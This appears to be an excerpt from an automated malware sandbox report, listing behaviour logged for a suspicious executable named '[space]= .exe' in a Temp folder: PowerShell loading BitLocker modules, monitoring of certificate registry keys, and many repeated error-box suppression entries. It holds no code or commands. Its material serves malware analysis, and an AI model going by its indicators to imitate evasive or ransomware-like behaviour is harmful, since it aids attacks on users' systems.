Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
